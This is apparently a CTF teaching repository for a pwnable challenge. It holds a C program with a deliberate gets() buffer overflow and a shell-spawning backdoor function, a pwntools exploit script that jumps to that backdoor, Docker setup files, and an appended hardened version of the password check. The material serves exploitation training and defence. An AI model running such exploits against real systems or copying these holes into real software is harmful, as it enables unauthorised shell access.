```
├── README.md
├── challenge
│   ├── Dockerfile
│   ├── asd.py
│   ├── flag
│   ├── system_health_check
│   ├── system_health_check.c
│   └── ynetd
└── ctf
    └── Dockerfile
```

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------

# pwn_docker_example
Example pwnable CTF challenge hosted with Docker. We used this code to run a challenge in a server setup with Docker, and then used a Docker container as a CTF OS to write and run the exploit.

- [Introduction to Docker for CTFs](https://www.youtube.com/watch?v=cPGZMt4cJ0I)
- [Solving This Pwnable CTF Challenge](https://www.youtube.com/watch?v=OqTpc_ljPYk)

# Related Binary Exploitation Resources:

- [Developing an Intuition for Binary Exploitation](https://www.youtube.com/watch?v=akCce7vSSfw)
- [Working with PIE binaries](https://www.youtube.com/watch?v=pphfcaGnWSA)
- [Another simple buffer overflow challenge](https://www.youtube.com/watch?v=oS2O75H57qU)

There is also a whole playlist using challenges from https://exploit.education. Later episodes explore some 64-bit challenges and go over various pitfalls:

- [Full Playlist](https://www.youtube.com/watch?v=iyAyN3GFM7A&list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN)

# More Docker Videos
- [How Docker Works - Intro to Namespaces](https://www.youtube.com/watch?v=-YnMr1lj4Z8)
- [Deepdive Containers - Kernel Sources and nsenter](https://www.youtube.com/watch?v=sHp0Q3rvamk)

--------------------------------------------------------------------------------
/challenge/Dockerfile:
--------------------------------------------------------------------------------

```dockerfile
# sudo docker build -t system_health_check .
# sudo docker run -d -p 1024:1024 --rm -it system_health_check

FROM ubuntu:19.10

RUN apt-get update

# Unprivileged user the challenge binary runs as
RUN useradd -d /home/ctf/ -m -p ctf -s /bin/bash ctf
RUN echo "ctf:ctf" | chpasswd

WORKDIR /home/ctf

COPY system_health_check .
COPY flag .
COPY ynetd .

# Challenge files are owned by root so the ctf user cannot modify them
RUN chown -R root:root /home/ctf

USER ctf
EXPOSE 1024
# ynetd listens on port 1024 and serves the binary's stdin/stdout over each connection
CMD ./ynetd -p 1024 ./system_health_check
```

--------------------------------------------------------------------------------
/challenge/asd.py:
--------------------------------------------------------------------------------

```python
from pwn import *

# Python 2 pwntools script (str padding and p64() output are concatenated directly).
# The IP is the Docker host the challenge container is published on.
p = remote("192.168.178.95", 1024)
print(p.recvline())

raw_input("attach gdb")

# Offset from the start of read_buf to the saved return address, recovered from
# the cyclic-pattern bytes that overwrote it during a crash.
padding = "A"*cyclic_find("aclaacma")
RET = p64(0x401016)  # a `ret` gadget, keeps the stack 16-byte aligned before system()
RIP = p64(0x401254)  # address of backdoor() in the non-PIE binary

# The NUL byte terminates the string for strcmp() (the password check passes),
# while gets() keeps reading the rest of the line into read_buf.
p.sendline("sUp3r_S3cr3T_P4s5w0rD\x00"+padding+RET+RIP)

p.interactive()
```

--------------------------------------------------------------------------------
/challenge/flag:
--------------------------------------------------------------------------------

```
LO{THIS_IS_TEST_FLAG}
```

--------------------------------------------------------------------------------
/challenge/system_health_check:
--------------------------------------------------------------------------------

Binary (not shown): https://raw.githubusercontent.com/LiveOverflow/pwn_docker_example/79c63b1fa38bf83ffdf972e6f1d3dfa339522902/challenge/system_health_check

--------------------------------------------------------------------------------
/challenge/system_health_check.c:
--------------------------------------------------------------------------------

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>

// gcc system_health_check.c -o system_health_check -no-pie -fno-stack-protector

// --------------------------------------------------- SETUP

// Unbuffered stdio so output reaches the socket immediately when run under ynetd
void ignore_me_init_buffering() {
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);
}

void kill_on_timeout(int sig) {
    if (sig == SIGALRM) {
        printf("[!] Anti DoS Signal. Patch me out for testing.");
        _exit(0);
    }
}

// Kill the process after 60 seconds so idle connections do not pile up
void ignore_me_init_signal() {
    signal(SIGALRM, kill_on_timeout);
    alarm(60);
}

// --------------------------------------------------- MENU

// Intended target for the overflow: never called by the program itself
void backdoor() {
    system("/bin/sh");
}

void remote_system_health_check() {
    char read_buf[0xff];
    puts("Enter password to get system details:\n");
    // gets() has no length limit: a line longer than read_buf overwrites the
    // saved return address (no stack protector, no PIE, see compile flags above)
    gets(read_buf);
    // strcmp() stops at the first NUL byte, so only the bytes before it are compared
    if(strcmp(read_buf, "sUp3r_S3cr3T_P4s5w0rD") == 0) {
        puts("Access Granted\n");
        system("top -b -n 1");
    } else {
        puts("Wrong password!\n");
        _exit(0);
    }
}

// --------------------------------------------------- MAIN

void main(int argc, char* argv[]) {
    ignore_me_init_buffering();
    ignore_me_init_signal();

    remote_system_health_check();
}
```

--------------------------------------------------------------------------------
/challenge/ynetd:
--------------------------------------------------------------------------------

Binary (not shown): https://raw.githubusercontent.com/LiveOverflow/pwn_docker_example/79c63b1fa38bf83ffdf972e6f1d3dfa339522902/challenge/ynetd

--------------------------------------------------------------------------------
/ctf/Dockerfile:
--------------------------------------------------------------------------------

```dockerfile
# docker build -t ctf:ubuntu19.10 .
# SYS_PTRACE and an unconfined seccomp profile are needed so gdb can attach to processes inside the container
# If using Windows
# docker run --rm -v %cd%:/pwd --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -d --name ctf -i ctf:ubuntu19.10
# If using Linux
# docker run --rm -v $PWD:/pwd --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -d --name ctf -i ctf:ubuntu19.10
# docker exec -it ctf /bin/bash

FROM ubuntu:19.10
ENV LC_CTYPE C.UTF-8
ENV DEBIAN_FRONTEND=noninteractive
RUN dpkg --add-architecture i386 && \
    apt-get update && \
    apt-get install -y build-essential jq strace ltrace curl wget rubygems gcc dnsutils netcat gcc-multilib net-tools vim gdb gdb-multiarch python python3 python3-pip python3-dev libssl-dev libffi-dev wget git make procps libpcre3-dev libdb-dev libxt-dev libxaw7-dev python-pip libc6:i386 libncurses5:i386 libstdc++6:i386 && \
    pip install capstone requests pwntools r2pipe && \
    pip3 install pwntools keystone-engine unicorn capstone ropper && \
    mkdir tools && cd tools && \
    git clone https://github.com/JonathanSalwan/ROPgadget && \
    git clone https://github.com/radare/radare2 && cd radare2 && sys/install.sh && \
    cd .. && git clone https://github.com/pwndbg/pwndbg && cd pwndbg && git checkout stable && ./setup.sh && \
    cd .. && git clone https://github.com/niklasb/libc-database && cd libc-database && ./get && \
    gem install one_gadget
```
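The two defects the challenge binary relies on are the unbounded `gets()` into `read_buf` and the fact that `strcmp()` stops at the first NUL byte, which is why the exploit line can start with the real password, a `\x00`, and then the overflow. The following is an added example, not code from the LiveOverflow repository: the read-then-compare step of `remote_system_health_check()` rewritten so the line can never overrun the buffer and a NUL byte in the input cannot cut the comparison short. The secret and the `0xff` buffer size are taken from the challenge source; `read_line_bounded`, `password_ok_memcmp`, `check_input` and `overlong_line_rejected` are names chosen here, and the inputs they are tested with are constructed. It also keeps the original `strcmp()` check as `password_ok_strcmp` so the two behaviours can be compared side by side.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>

/* Added example, not part of the original repository: a bounded replacement
 * for the gets()/strcmp() check in remote_system_health_check(). The secret
 * and buffer size match the challenge source. */
#define PASSWORD "sUp3r_S3cr3T_P4s5w0rD"
#define READ_BUF_SIZE 0xff

/* Read one line byte by byte. At most size-1 bytes are stored in buf (always
 * NUL-terminated); the rest of an over-long line is consumed and dropped, so
 * it can neither overrun the stack buffer nor spill into the next read.
 * Returns the number of bytes the line actually contained, counting embedded
 * NULs and dropped bytes, or -1 on EOF with no data. */
long read_line_bounded(FILE *in, char *buf, size_t size) {
    size_t stored = 0, total = 0;
    int c;
    while ((c = fgetc(in)) != EOF && c != '\n') {
        if (stored + 1 < size)
            buf[stored++] = (char)c;
        total++;
    }
    buf[stored] = '\0';
    if (c == EOF && total == 0)
        return -1;
    return (long)total;
}

/* The challenge's check: strcmp() stops at the first NUL byte, so a line of
 * PASSWORD followed by "\0" and arbitrary extra bytes compares equal even
 * though gets() stored all of it. */
int password_ok_strcmp(const char *input) {
    return strcmp(input, PASSWORD) == 0;
}

/* Hardened check: the line must be exactly as long as the secret (so extra
 * bytes after a NUL, and over-long lines, are rejected up front) and every
 * byte must match. input_len must be the true byte count from
 * read_line_bounded(), not strlen(). */
int password_ok_memcmp(const char *input, size_t input_len) {
    const size_t want = sizeof(PASSWORD) - 1;
    if (input_len != want)
        return 0;
    return memcmp(input, PASSWORD, want) == 0;
}

/* Bounded version of the challenge's read-then-compare step. Returns 1 when
 * access would be granted, 0 otherwise. */
int check_from_stream(FILE *in) {
    char read_buf[READ_BUF_SIZE];
    long n = read_line_bounded(in, read_buf, sizeof read_buf);
    if (n < 0)
        return 0;
    /* want < READ_BUF_SIZE, so when n == want all n bytes were stored */
    return password_ok_memcmp(read_buf, (size_t)n);
}

/* Run check_from_stream() on an in-memory byte string (constructed test
 * input) so the logic can be exercised without a socket. */
int check_input(const char *data, size_t len) {
    FILE *in = fmemopen((void *)data, len, "r");
    if (in == NULL)
        return -1;
    int ok = check_from_stream(in);
    fclose(in);
    return ok;
}

/* Constructed over-long line: the password, 600 filler bytes, a newline.
 * With gets() this would overrun read_buf; here it is read in full, only the
 * first READ_BUF_SIZE-1 bytes are stored, and the check rejects it. */
int overlong_line_rejected(void) {
    char line[sizeof(PASSWORD) - 1 + 600 + 1];
    size_t pw = sizeof(PASSWORD) - 1;
    memcpy(line, PASSWORD, pw);
    memset(line + pw, 'A', 600);
    line[pw + 600] = '\n';
    return check_input(line, sizeof line) == 0;
}

int main(void) {
    puts("Enter password to get system details:");
    if (check_from_stream(stdin))
        puts("Access Granted");
    else
        puts("Wrong password!");
    return 0;
}
```

Compiled as a drop-in for the challenge's read step, the same payload (`password`, `\x00`, padding, addresses) is rejected twice over: the byte count no longer matches the secret's length, and nothing past byte 254 is ever written to the stack. Note that `-fno-stack-protector` and `-no-pie` in the original compile line are what make the overflow so direct; the bounded read removes the bug itself rather than relying on those mitigations.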